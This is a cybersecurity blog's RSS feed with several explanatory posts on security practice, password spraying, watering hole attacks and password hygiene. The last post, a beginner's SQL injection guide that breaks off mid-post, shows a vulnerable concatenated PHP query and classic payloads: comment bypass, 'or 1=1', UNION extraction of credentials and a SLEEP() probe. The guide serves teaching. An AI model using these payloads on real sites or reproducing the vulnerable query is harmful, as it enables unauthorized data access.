<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[The Cyber Patch]]></title><description><![CDATA[Cybersecurity Thoughts, stories, and ideas.]]></description><link>https://thecyberpatch.com/</link><image><url>https://thecyberpatch.com/favicon.png</url><title>The Cyber Patch</title><link>https://thecyberpatch.com/</link></image><generator>Ghost 5.52</generator><lastBuildDate>Wed, 18 Feb 2026 23:58:06 GMT</lastBuildDate><atom:link href="https://thecyberpatch.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Security & Convenience: Finding the Right Balance]]></title><description><![CDATA[Too much security can lead to a decrease in convenience, causing users to bypass controls and leave sensitive information vulnerable. Too little security can result in critical information being accessible to unauthorized parties. ]]></description><link>https://thecyberpatch.com/security-con-finding-the-right-balance/</link><guid isPermaLink="false">63da9bcba568e2a9f8b6d201</guid><category><![CDATA[Cyber Knowledge]]></category><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 01 Feb 2023 17:18:20 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2023/02/sec-vs-convenience.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2023/02/sec-vs-convenience.jpg" alt="Security &amp; Convenience: Finding the Right Balance"><p>Information security is a critical aspect of modern society, as we rely heavily on digital systems to store and transmit sensitive information. Ensuring that this information remains confidential and secure is essential to maintain trust and protect against cyber threats. 
However, achieving a proper balance between security controls and convenience is a major challenge.</p><figure class="kg-card kg-image-card"><img src="https://thecyberpatch.com/content/images/2023/02/SCR-20230201-gt2-2.png" class="kg-image" alt="Security &amp; Convenience: Finding the Right Balance" loading="lazy" width="394" height="324"></figure><p>On one hand, security controls are necessary to prevent unauthorized access and protect sensitive information. For example, strong passwords, two-factor authentication, and encryption are all security measures that can help keep information secure. However, as the number of security controls increases, the user experience becomes increasingly inconvenient. For example, a user might have to remember multiple passwords or enter long codes every time they want to access a system.</p><p>On the other hand, convenience is an important factor to consider because it can affect user behavior and determine whether security controls are effective. For example, if users are frustrated by the inconvenience of logging into a system, they might be more likely to write their passwords down where they can be easily accessed. Similarly, if users find it too difficult to navigate a complex security system, they may be more likely to seek out alternative, less secure solutions.</p><p>The key to effective information security is finding a balance between security controls and convenience. Too much security can lead to a decrease in convenience, which can result in users bypassing the controls and leaving sensitive information vulnerable. On the other hand, too little security can result in critical information being easily accessible to unauthorized parties.</p><p>To ensure a balance between security controls and convenience, you can take the following steps:</p><ol><li>Conduct a risk assessment: Start by assessing the risks to your sensitive information, and determine what level of security is required to mitigate those risks. 
This will help you determine the right balance between security controls and convenience.</li><li>Choose the right security measures: Choose security measures that are appropriate for your risk level and provide the necessary level of protection. Ensure that the measures are both effective and convenient for users.</li><li>Train users: Provide users with the training and resources they need to understand and use security measures effectively. This will help them understand the importance of security controls and why they need to follow them.</li><li>Monitor user behavior: Regularly monitor user behavior to ensure that security measures are being used correctly. This can help you identify any areas where users are struggling with convenience and make changes as necessary.</li><li>Continuously review and update: Regularly review and update your security measures to ensure that they are still effective and relevant. This will help you maintain the balance between security and convenience over time.</li><li>Consider user feedback: Encourage users to provide feedback on the security measures in place, and use their feedback to improve the overall experience. This can help you identify areas where you can improve convenience without sacrificing security.</li></ol><p>In conclusion, finding a balance between security controls and convenience is essential for effective information security. By striking a balance, organizations can ensure that their security measures are both effective and usable, reducing the risk of cyber attacks and protecting sensitive information. This requires careful consideration of the security measures being implemented and a clear understanding of the impact they will have on users. 
Only by taking a balanced approach can organizations ensure that their information security systems are effective and usable and that sensitive information remains secure.</p>]]></content:encoded></item><item><title><![CDATA[Data Privacy vs Data Security]]></title><description><![CDATA[Data security and privacy are popular within data security regulations that impose strict penalties on companies that ignore ongoing threats from cyber attacks such as malware and intruders. But even some IT professionals aren't clear about the difference between data privacy and data security. ]]></description><link>https://thecyberpatch.com/data-privacy-vs-data-security/</link><guid isPermaLink="false">6293af27a8ebd2c25ffff618</guid><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Thu, 02 Jun 2022 12:00:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2022/05/Data_Privacy_vs._Data_Security.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2022/05/Data_Privacy_vs._Data_Security.jpg" alt="Data Privacy vs Data Security"><p>The importance of cybersecurity has grown exponentially over the last decade. Today, data security and privacy are popular within data security regulations that impose strict penalties on companies that ignore ongoing threats from cyber attacks such as malware and intruders. It&apos;s still the hottest topic for IT professionals. But even some IT professionals aren&apos;t clear about the difference between data privacy and data security. This week&apos;s blog post explains the similarities and differences between these terms.</p><h3 id="what-is-data-privacy">What Is Data Privacy?</h3><p>Privacy ensures that unauthorized parties do not have access to your information and that you continue to control your personally identifiable information (PII). 
Therefore, data privacy primarily deals with procedures and policies governing the collection, storage, and use of PII and proprietary company information such as trade secrets, personnel, and internal processes. PII is highly confidential because of the civil and criminal liability companies and individuals face if improper disclosure is allowed overtly or due to unintended data security breaches.<br><br>To ensure privacy, you need more than a specific technology or set of technologies. This includes training all employees who have access to sensitive data about approved data protection processes. Just as airline pilots use checklists to ensure that essential items are checked before a flight and monitored during flight, IT professionals must also be willing to use privacy policies and other resources to protect PII and other sensitive information. In particular, to ensure privacy, IT professionals must have a set of policies and processes detailing how organizations and their employees collect, store, and use sensitive data on all systems. This privacy policy aims for all employees to recognize the importance of privacy, understand how to prevent inappropriate disclosure of information, and deal with privacy issues and policy violations.<br><br>Data breaches are no longer just embarrassing or inconvenient for businesses. Currently, privacy laws such as GDPR impose penalties for failing to protect the privacy of PII and other sensitive personal information. These compliance standards may impose financial penalties and criminal charges for intentional and, in some cases, unintentional disclosures of PII. GDPR imposes privacy standards and legal requirements on all companies that store or process the personal information of EU residents.</p><h3 id="what-is-data-security">What Is Data Security?</h3><p>Data security uses physical and logical strategies to protect information from data breaches, cyber-attacks, and accidental or intentional data loss. 
Specifically, it covers the technologies and techniques used to prevent:</p><!--kg-card-begin: markdown--><ul>
<li>Unauthorized access</li>
<li>The deliberate loss of sensitive data</li>
<li>Accidental loss or corruption of sensitive data</li>
</ul>
<!--kg-card-end: markdown--><p>Examples of measures to ensure data security include data encryption, both at rest and in transit, and physical and logical access control to prevent unauthorized access. Specific techniques include multi-factor authentication, multiple layers of network and application-level access control, and detection and isolation of rogue devices after they connect to the network. Regular backups and a proven disaster recovery plan are essential parts of data security.<br><br>In short, data security is based on a technically sophisticated and comprehensive approach to protecting all networks, applications, devices, and data stores within an enterprise IT infrastructure.</p><h3 id="data-privacy-vs-data-security">Data Privacy vs Data Security</h3><p>The best way to understand the difference between data security and privacy is to look at the mechanisms used in your data security and privacy policies. Privacy policies control how data is collected, processed, and stored, while your organization&apos;s data security is more robust, detailing physical and logical controls to secure data. The way you collect, store, or distribute that data can violate your privacy policy. For example, enterprises can ensure that sensitive information is encrypted, masked, and adequately restricted to authorized parties. However, improper collection of this data, such as not obtaining informed consent from the data owner before collecting the data, does not change the security of the data but violates data privacy rules.</p><h3 id="conclusion">Conclusion</h3><p>Implementing a privacy policy system is no longer just an admirable goal, given what&apos;s at stake for organizations that are entrusted with the PII of their customers and employees. This is a mission-critical aspect of an organization&apos;s information security framework and operations. Best security practices were implemented before privacy regulations were enacted. 
Today, data protection security systems directly impact most organizations&apos; risk management strategies. <a href="https://thecyberpatch.com/cybersecurity-is-everyones-responsibility/">Protecting data privacy and security should be a priority for all employees, not just IT professionals.</a><br></p>]]></content:encoded></item><item><title><![CDATA[It Can Be Done: Preventing Data Breaches]]></title><description><![CDATA[Infringement of sensitive information, whether personal information such as credit cards or proprietary information such as intellectual property or financial forecasts, can have serious consequences]]></description><link>https://thecyberpatch.com/it-can-be-done-preventing-data-breaches/</link><guid isPermaLink="false">6287c7cfdb7d6965bb303cb1</guid><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Thu, 26 May 2022 13:00:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2022/05/data-breach-Incidents.jpeg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2022/05/data-breach-Incidents.jpeg" alt="It Can Be Done: Preventing Data Breaches"><p>Preventing data breaches is a top priority for organizations of all sizes and sectors. Infringement of sensitive information, whether personal information such as credit cards or proprietary information such as intellectual property or financial forecasts, can have serious consequences. Organizations suffering from data breach incidents face compliance and additional fines, market share loss, and reputational damage.</p><p>As the amount of information grows and the threat landscape changes, deciding how to prevent data breaches seems like an insurmountable challenge. It&apos;s not. 
Though not an exhaustive list, here are six great tips to protect businesses from data breaches.</p><h3 id="develop-a-sound-information-security-policy">Develop a Sound Information Security Policy</h3><p>Every organization must have a written information security policy that covers all aspects of data processing on the network. That is, what data can be collected, how data is managed, the retention of each type of data, the level of security control required for each type of data, etc.</p><p>Implementing this policy requires automated data detection and classification. By identifying and classifying all sensitive information you create, process, and store by type, you can protect your information according to its value and confidentiality.</p><h3 id="become-compliant-maintain-it-too">Become Compliant (Maintain it too)</h3><p>You need to understand what regulations your organization is subject to and use those requirements to determine which data security controls to implement for each type of data. For example, if your company stores credit card payment data, it must be PCI DSS compliant. Therefore, you should ensure that all files and databases containing your customers&apos; credit card numbers are adequately protected and constantly monitored for suspicious activities.</p><h3 id="employ-data-encryption-where-applicable">Employ Data Encryption Where Applicable</h3><p>Data encryption is a data security best practice that is often overlooked. Still, it is very effective because it makes stolen data useless to thieves. Encryption can be software-based or hardware-based. It is essential to encrypt the data both in storage and in transit. In particular, make sure that portable devices containing sensitive data are encrypted.</p><h3 id="adapt-the-principles-of-least-privilege">Adopt the Principle of Least Privilege</h3><p>Only authorized personnel need to have access to confidential data. 
By strictly applying the principle of least privilege (restricting the access rights of each employee, contractor, and other users to the minimum necessary to do the job), you can minimize exposure to malicious insiders and threat actors who seek to compromise confidential data.</p><h3 id="audit-your-infrastructure-regularly">Audit Your Infrastructure Regularly</h3><p>Regular audits help assess the effectiveness of security management and identify security risks. Experts recommend conducting audits at least twice a year, but audits can be done more frequently, be it quarterly or monthly. Internal audits help you prepare for compliance audits and improve security.</p><p>Vulnerability management is critical and should be a part of your audit strategy. Assign values to all assets in your IT infrastructure, such as servers, computers, and databases. Then use techniques such as vulnerability scanning and penetration testing to identify vulnerabilities and threats in each asset. By assessing each risk&apos;s likelihood and potential impact, you can prioritize actions to mitigate the most critical vulnerabilities of your most valuable assets. Be sure to PATCH, PATCH, PATCH!</p><h3 id="security-awareness-training-for-all">Security Awareness Training For All</h3><p>Cybersecurity is not just the responsibility of IT and security teams. Users need to be aware of best practices for identifying threats and preventing data breaches. Many data breaches result from organizational errors, such as clicking on phishing links or copying unencrypted data to a personal device. Educating users about protecting sensitive data is essential to prevent data breaches.</p><p>In particular, teach your users how to choose a strong password. Explain what &quot;strong&quot; really means and why strong passwords are essential. 
Then, whenever possible, automate the implementation of that requirement through Group Policies.</p><h3 id="conclusion">Conclusion</h3><p>By following these six best practices, organizations can reduce the risk of data breaches. By prioritizing data protection and choosing the right solution, you can significantly improve cybersecurity and regulatory compliance.</p>]]></content:encoded></item><item><title><![CDATA[Password Spraying Attacks: Detection and Defense Mechanisms]]></title><description><![CDATA[It is important to note that given the nature of password spraying attacks, you cannot prevent them, but you can detect and stop them in their tracks. This blog post describes how this type of attack unfolds, how to detect ongoing attacks, and how to reduce the risk of becoming the next victim.]]></description><link>https://thecyberpatch.com/password-spraying-attacks/</link><guid isPermaLink="false">6286c79c270d56d66eb93264</guid><category><![CDATA[Cyber Tips]]></category><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Thu, 19 May 2022 22:45:40 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2022/05/password-spray-.webp" medium="image"/><content:encoded><![CDATA[<h2 id="what-is-a-password-spraying-attack">What is a Password Spraying Attack?</h2><img src="https://thecyberpatch.com/content/images/2022/05/password-spray-.webp" alt="Password Spraying Attacks: Detection and Defense Mechanisms"><p>A typical brute force attack targets a single account and attempts multiple passwords to gain access. Modern cybersecurity protocols can detect this suspicious activity and lock the account if there are too many failed login attempts in a short period.</p><p>Password spraying, however, involves trying to log in to multiple user accounts with many common passwords. Trying one password at a time on many different accounts bypasses the standard lockout protocol. 
It allows an attacker to try more and more passwords before being detected or blocked. Unfortunately, password spraying attacks are often successful because many users do not follow <a href="https://thecyberpatch.com/stay-safe-secure-your-password/">password best practices</a>. The top 200 passwords leaked in a data breach in 2019 contained obvious combinations of numbers such as &quot;12345&quot; and the word &quot;password&quot; itself.<br><br>Casting a wide net can have at least some success, but today&apos;s knowledgeable threat actors rely on a more accurate approach. They usually set their sights on users who use single sign-on authentication (SSO), hoping that they will infer credentials that will allow access to multiple systems or applications. They also often target users with cloud services and federated authentication applications. Federated authentication helps mask malicious traffic, so this approach can allow a threat actor to move laterally.<br><br>If a password spraying attack compromises an account, the victim may experience a temporary or permanent loss of sensitive information. A successful attack can mean business disruption, significant loss of revenue, and loss of reputation for an organisation.</p><h2 id="how-to-detect-a-password-spraying-attack">How to Detect a Password Spraying Attack</h2><p>While traditional measures may not automatically detect password spraying attacks, there are some reliable indicators to watch out for. The most obvious are numerous authentication attempts in a short period of time, especially those that fail due to incorrect passwords. Of course, a closely related indicator is the increase in account bans.<br><br>Password spraying attacks also often lead to a sudden increase in login attempts affecting SSO portals or cloud applications. Threat actors can use automated tools to perform thousands of login attempts in a short amount of time. 
Often, these attempts come from a single IP address or device (though they could employ measures to switch up IPs).</p><h2 id="how-to-reduce-the-risk-of-becoming-the-next-victim">How to Reduce the Risk of Becoming the Next Victim</h2><p>While it is important to identify successful attacks immediately, it can be devastating to allow an attacker to access sensitive data even for a short period of time. A healthy cybersecurity strategy requires a comprehensive and proactive approach that guarantees layered protection to block as many attacks as possible. Be sure to follow these best practices:</p><ul><li>Require multi-factor authentication for all users.</li><li>Develop a secure password strategy for shared accounts.</li><li>Establish a robust password reset policy after account lockout.</li><li>Conduct regular user awareness training to ensure that all users understand the threat of password spraying and <a href="https://thecyberpatch.com/stay-safe-secure-your-password/">how to develop and maintain strong passwords</a>.</li></ul>]]></content:encoded></item><item><title><![CDATA[Watering Hole Attacks: What are they?]]></title><description><![CDATA[In nature, predators hide next to watering holes, where prey gathers, and wait for the opportunity to attack. Unfortunately, cybercriminals have found ways to emulate this predatory behaviour. They prey on unsuspecting victims browsing regularly visited websites. 
This is called a watering hole attack.]]></description><link>https://thecyberpatch.com/watering-hole-attacks/</link><guid isPermaLink="false">60775e74f6b9d6783b9f4c56</guid><category><![CDATA[Cyber Knowledge]]></category><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Thu, 01 Apr 2021 01:03:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2021/04/wateringhole.png" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2021/04/wateringhole.png" alt="Watering Hole Attacks: What are they?"><p>In nature, predators hide next to bodies of water (watering holes), where prey gathers, and wait for the opportunity to attack. Unfortunately, cybercriminals have found a way to emulate this predatory behaviour. They prey on unsuspecting victims browsing regularly visited websites. This is called a watering hole attack.</p><p>The concept of watering hole attacks is similar to phishing. What makes phishing different from watering hole attacks is that phishing attempts to persuade unsuspecting victims to click on malicious links or attachments. Phishing attempts could also have victims perform other actions through which they would divulge their private information.</p><p>Watering hole attacks, however, don&#x2019;t need to lure victims in that way. In this type of attack, attackers have already positioned themselves in a particular space, using malware to infect a third-party service or a website that the victim already frequents. This tactic is often executed with the idea of infecting devices to gain access to sensitive computer systems and steal data, whether financial, personal, strategic or intellectual.</p><p>While watering hole attacks are targeted, they have a broader scope than phishing attacks. They will catch more victims than those targeted. As a result, attackers will often combine watering hole attacks with spear-phishing campaigns. 
This way, they can send highly targeted and customized emails to the victim, prompting them to visit a website that seems harmless and familiar but is compromised.</p><p>Watering hole attacks usually target businesses and organizations through their employees, vendors and suppliers. Still, public websites that are popular in the victim&#x2019;s industry can be effective as well. These include discussion boards, smaller news outlets, industry conferences, and more.</p><h3 id="how-does-water-holing-work">How does water holing work?</h3><p>Attackers start with a victim(s). They then:</p><ol><li>Find websites that the victim(s) frequents.</li><li>Compromise the websites.</li><li>Wait for the victim(s) to enter.</li><li>Inject malware to penetrate the network, and move laterally to other systems to achieve their objective.</li></ol><p>Simple concept, right? Well, that is the simplified version of it. <strong>But how do cybercriminals know which websites are the right ones?</strong></p><p>They can&#x2019;t just go after the large, popular websites that are likely secure and hard to compromise. They instead find their way to smaller, less secure websites that are still relevant to their targets, such as blogs and smaller company websites. In doing this search for websites the victim frequents, attackers will leverage legitimate resources. These resources include regular search engines, social networks, and IoT search engines such as Shodan, as well as more obscure ways of gaining intelligence.</p><p>Once the appropriate website &#x2014; the watering hole &#x2014; has been established, attackers will look for exploitable weaknesses and vulnerabilities on the website, seeking a way to inject malicious code into various parts, usually by embedding it in banners and ads. When users visit the site and click on an element with the malicious code, it will redirect them to another website that automatically downloads a script that scans for new and known vulnerabilities. 
If such vulnerabilities exist, these are also used to infect the target with malware. This way, attackers gain access to the target network and perform lateral movements to find sensitive data such as customer information, financial data and intellectual property and exfiltrate or compromise that data.</p><h2 id="watering-hole-attack-example">Watering hole attack example</h2><p>While watering hole attacks aren&#x2019;t among the most common types of cybercrime, there have been a few notable real-world examples.</p><p>One such example of this attack occurred in 2013. Attackers managed to <a href="https://www.darkreading.com/attacks-and-breaches/microsoft-hacked-joins-apple-facebook-twitter/d/d-id/1108800?ref=thecyberpatch.com">compromise systems at Facebook, Twitter, Microsoft, and Apple</a> as part of a wide-ranging watering hole operation using websites that attracted employees from these organizations. Among other watering holes, the attackers used two mobile application development websites, one of which was iPhoneDevSDK.com. Attackers compromised these websites to serve drive-by downloads of exploits for a zero-day vulnerability in the Java browser plug-in running on both Windows and macOS systems. In addition to the four significant organizations mentioned, these watering hole attacks also affected auto manufacturers, government agencies and various other businesses.</p><h2 id="how-to-prevent-watering-hole-attacks">How to prevent watering hole attacks</h2><p>The prevention of watering hole attacks, just like any highly targeted attacks, can be challenging. However, a combination of security awareness and proper cybersecurity culture in the organization and keeping security controls in place can help establish an effective organizational defense.</p><p>Here are a few best practices for preventing watering hole attacks:</p><ul><li>Watering hole attacks are also known to exploit known vulnerabilities. 
So the first step in any network defense is to <strong>keep all your systems, software, and operating systems updated</strong> to the latest version with all patches offered by vendors applied.</li><li><strong>The Zero Trust</strong> methodology can and should be applied to mitigate watering hole attacks. Verify all third-party traffic, whether it comes from a trusted partner or a popular website. A security solution that inspects all network traffic will allow security researchers to determine if the traffic is coming from a compromised website being used for a watering hole attack.</li><li><strong>Web gateways</strong> are a great way to defend organizations against drive-by downloads that match a known signature or bad reputation and can provide detection for opportunistic watering hole attacks.</li><li>As mentioned, victims are often lured to websites compromised in a watering hole attack via spear-phishing emails. Having <strong>an email security solution</strong> providing advanced malware analysis at the time of email delivery can help protect users.</li><li><strong>Educate your employees</strong> on the nature of these attacks and the tell-tale signs of compromised websites used in watering hole attacks and incorporate prevention and awareness practices. This strategy will ensure your employees don&#x2019;t fall victim, especially when they&#x2019;re innocently reading the latest discussions on industry boards and communication channels.</li></ul><h2 id="conclusion">Conclusion</h2><p>While not common, watering hole attacks are dangerous. Though these attacks have the perfect components for making them difficult to detect, an effective combination of security awareness, education, security controls, solutions, and practices can help prevent them.</p>]]></content:encoded></item><item><title><![CDATA[Stay Safe, Secure your Password]]></title><description><![CDATA[When you think of password security, what comes to mind? 
For me, it is what can I do to keep my password safe. However, it is more than that. ]]></description><link>https://thecyberpatch.com/stay-safe-secure-your-password/</link><guid isPermaLink="false">6065f1bec688166eb5b9755b</guid><category><![CDATA[Cyber Knowledge]]></category><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Sun, 28 Feb 2021 22:27:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2021/04/Antivirus_On_page_3-min.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2021/04/Antivirus_On_page_3-min.jpg" alt="Stay Safe, Secure your Password"><p>When you think of password security, what comes to mind? For me, it is what can I do to keep my password safe. However, it is more than that. A password is an untold word or phrase used to gain access to a computer system, services, or a place. One would say, and I quote, &quot;Treat your password like your toothbrush. Don&apos;t let anyone else use it, and get a new one every six months&quot;.</p><h1 id="five-easy-steps-to-keep-your-password-secure"><strong>Five easy steps to keep your password secure:</strong></h1><h2 id="a-strong-password">A Strong Password</h2><p>You can start by making your password strong. A strong password usually consists of 10 or more characters and includes upper and lower case letters, numbers, and symbols. The password&apos;s complexity increases the amount of time it takes for a brute force attacker to guess your password.</p><h2 id="keep-clear-of-personal-info"><strong>Keep Clear of Personal Info</strong></h2><p>It is much easier for one to remember their password if it is personal. Personal information includes your favourite pet, people&apos;s names, birthdates, and even a wedding anniversary, to name a few. We live in this technological age, where we use social media to socialize. 
It is easy for anyone to find this information, which is why using it in a password is not recommended.</p><h2 id="stay-away-from-complete-words"><strong>Stay Away From Complete Words</strong></h2><p>Another way to make it hard for attackers to guess your passwords through brute force or even dictionary attacks is to avoid using names or full words in your passwords. Rather than using a word, you might consider using a phrase for your password to make it a strong password. Just remember to mix it up using the principles of a strong password.</p><h2 id="double-the-strength">Double the Strength</h2><p>To increase your password strength, you can start enabling two-factor authentication for your accounts. This way, sites can further ensure that the person trying to access your account is you. </p><h1 id="have-i-been-pwned">Have I been pwned?</h1><p>You may be wondering whether you have been hacked or whether your password has been stolen. In other words, was I pwned? Troy Hunt, a security expert, has made it relatively easy for us to check if we are a victim of data breaches. He created one of the oldest and best-known sites for this, called <strong><a href="https://haveibeenpwned.com/?ref=thecyberpatch.com">Have I Been Pwned</a>.</strong></p><p>All you have to do is go to the site, where you&apos;ll see a simple search bar. Enter your email address (safely), and the site will check it against multiple data breach records. In return, the site will inform you if the information entered has been seen in a data breach.</p><h2 id="what-should-i-do-if-my-account-has-been-pwned"><strong>What should I do if my account has been pwned?</strong></h2><p>Suppose your email address got included in a data breach. In that case, it would be the best move to change your login password for your email address and the service affected by the breach. 
However, if you are reusing passwords (which is a bad practice), you also want to change that password on ALL those other services.</p><p>Ideally, it would be best if you never used the same passwords across multiple websites. It can be hard to remember multiple logins, but it is safer not to repeat your passwords.</p><p><strong>If you are having trouble implementing these recommendations, consider using a password manager. Password managers are great for creating and storing complex passwords.</strong></p><hr><p>Guest Author: <a href="https://www.linkedin.com/in/sherikarichards/?originalSubdomain=jm&amp;ref=thecyberpatch.com">Sherika Richards</a></p>]]></content:encoded></item><item><title><![CDATA[Beginner's Guide: Understanding SQL Injections]]></title><description><![CDATA[SQL injection (SQLi) is an attack on a web application that compromises its database through malicious SQL statements. As it's a common attack, let's examine what it is, how it happens, and how to defend yourself from it.]]></description><link>https://thecyberpatch.com/understanding-sql-injections/</link><guid isPermaLink="false">601736a106fe25017eb4f31f</guid><category><![CDATA[Vulnerability]]></category><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Sun, 31 Jan 2021 23:57:30 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2021/01/What-is-an-SQL-Injection-Attack.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2021/01/What-is-an-SQL-Injection-Attack.jpg" alt="Beginner&apos;s Guide: Understanding SQL Injections"><p>Structured Query Language (SQL) is a language that allows for interaction with databases. Many modern web applications use databases to manage data and display dynamic content to users.</p><p>SQL injection (SQLi) is an attack on a web application that compromises its database through malicious SQL statements. 
As it&apos;s a common attack, let&apos;s examine what it is, how it happens, and how to defend yourself from it.</p><h2 id="what-is-sql-injection">What is SQL Injection?</h2><p>SQL injection is a type of attack on a <a href="https://www.indeed.com/career-advice/career-development/what-is-web-application?ref=thecyberpatch.com">web application</a> that allows an attacker to enter malicious SQL statements into the web application. By injecting malicious SQL statements, an attacker could potentially gain access to, modify, and destroy sensitive data in the database.</p><p><a href="https://en.wikipedia.org/wiki/SQL_injection?ref=thecyberpatch.com">Jeff Forristal first discovered SQL injection in 1998</a>. In the two decades since its discovery, SQL injection attacks have remained prevalent. The severity of injection attacks on web applications is widely recognized, and defending against them has consistently been the top priority of web developers when developing web applications.</p><p>SQL injection is also one of the <a href="https://owasp.org/www-project-top-ten/2017/A1_2017-Injection?ref=thecyberpatch.com">top ten most critical web application security risks</a> according to the Open Web Application Security Project (OWASP).</p><h2 id="how-does-the-sql-injection-vulnerability-work">How Does the SQL Injection Vulnerability Work?</h2><p>An SQLi vulnerability can give an attacker complete access to your application&apos;s database through the use of malicious SQL statements. Let&apos;s examine an example of how a vulnerable application works.</p><p>Imagine the workflow of a regular web application that involves database requests through user inputs. You accept the user input through a form, a login form, for example. You then query the application database with the fields submitted by the user to validate their identity. The structure of the SQL query to your database looks something like this:</p><!--kg-card-begin: markdown--><pre><code>SELECT * FROM users 
WHERE username = &apos;johnbrown&apos; AND password = &apos;johnpassword&apos;;
</code></pre>
<!--kg-card-end: markdown--><p>To make things simple, let&apos;s assume you are storing passwords in plaintext, which is a terrible idea. When storing passwords in a database, it is recommended to use a <a href="https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/?ref=thecyberpatch.com">salt and hash</a>, but I digress. So, if you accepted the username and password from the form, you may define the query in PHP as:</p><!--kg-card-begin: markdown--><pre><code>// Connects to SQL database

$db_query = &quot;SELECT * FROM users 
WHERE username = &apos;&quot;.$user.&quot;&apos; AND password = &apos;&quot;.$password.&quot;&apos;;&quot;;

// Executes query
</code></pre>
<!--kg-card-end: markdown--><p>If the user enters the value <em><strong>&quot;admin&apos;;--&quot;</strong></em> in the username field, and &quot;blahblahblah&quot; in the password field, the resulting SQL query that the variable $db_query generates will be:</p><!--kg-card-begin: markdown--><pre><code>SELECT * FROM users WHERE username = &apos;admin&apos;;--&apos; AND password = &apos;blahblahblah&apos;;
</code></pre>
<!--kg-card-end: markdown--><p><strong>What does this query do? </strong>In SQL, a comment starts with double dashes (--). By adding a comment after the username, the query filters only by the username without considering the password. If there were no security measures to avoid this, you would be granted administrative access to the web application just by using this method.</p><p>Alternatively, a boolean attack (which we&apos;ll discuss later) is also an option in this example to gain access. If an attacker enters <em><strong>&quot;blahblahblah&apos; or 1=1;--&quot;</strong></em> in the password field, the resulting query would be:</p><!--kg-card-begin: markdown--><pre><code>SELECT * from users WHERE username = &apos;admin&apos; AND password = &apos;blahblahblah&apos; or 1=1;--&apos;;
</code></pre>
<!--kg-card-end: markdown--><p>In this instance, though the password is wrong, an attacker would be authenticated as an administrator into the application. In another example, let&apos;s say your web page displays the results of the database query. An attacker can use different SQL commands to display the tables and their contents in the database, or selectively drop tables if they so wish.</p><h2 id="types-of-sql-injection-attacks">Types of SQL Injection Attacks</h2><p>Now that you are aware of the basics of a SQL injection attack, let&apos;s explore some of the different SQL injection types.</p><h3 id="in-band-sql-injection">In-Band SQL Injection</h3><p>In-Band SQL injection is the simplest form of SQL injection. In this process, the attacker can use the same channel to insert the malicious SQL code into the application and gather the results. Two types of in-band SQL injections are:</p><h4 id="error-based-injection-attack">Error-Based Injection Attack</h4><p>An attacker uses the error-based SQL injection technique during the initial phases of their attack. The concept behind an error-based SQL injection is to get additional information about the database structure that the web application follows. For example, an error message may reveal the table and column names used in the query. An attacker could leverage that data in further attacks.</p><h4 id="union-based-injection-attack">Union-Based Injection Attack</h4><p>An attacker using the SQL UNION statement can display the results from a different table. For example:</p><!--kg-card-begin: markdown--><pre><code>SELECT link, title FROM posts
WHERE id &lt; 10 UNION SELECT username, password FROM users;--;
</code></pre>
<!--kg-card-end: markdown--><h3 id="inferential-sql-injection-attacks-blind-sql-injection-">Inferential SQL Injection Attacks (Blind SQL Injection)</h3><p>Even if an attacker generates an error in the SQL query, the query&apos;s response might not be displayed directly to the web page. In such a case, the attacker needs to penetrate further.</p><p>In this SQL injection method, the attacker sends numerous queries to the database to assess how it interprets them. An inferential SQL injection is sometimes referred to as <strong>blind SQL injection</strong>. Two types of Inferential SQL Injections are:</p><h4 id="boolean-injection-attack">Boolean Injection Attack</h4><p>Suppose an SQL query results in an error that was not handled properly. In such a case, the resulting web page may display an error, load partially, or load a blank page.</p><p>In a boolean SQL injection, the attacker assesses which parts of a user&apos;s input are vulnerable by trying two different variants of a boolean clause:</p><ul><li>&quot;&#x2026; OR 1=1&quot;</li><li>&quot;&#x2026; AND 1=2&quot;</li></ul><p>Suppose the application works as it should in the first case but shows an anomaly in the second case. In that case, it indicates that the application is vulnerable to boolean-based SQL injection attacks.</p><h4 id="time-based-injection-attack">Time-Based Injection Attack</h4><p>A time-based SQL injection attack can also help an attacker assess if a web application is vulnerable to SQL injection. With this method, an attacker uses a pre-defined time-based function of the application&apos;s database management system. 
For example, in MySQL, <a href="http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html?ref=thecyberpatch.com#function_sleep">the</a><em><a href="http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html?ref=thecyberpatch.com#function_sleep"> SLEEP()</a> </em>function tells the database to wait for a certain number of seconds.</p><!--kg-card-begin: markdown--><pre><code>SELECT * FROM user_comments WHERE post_id=1-SLEEP(15);
</code></pre>
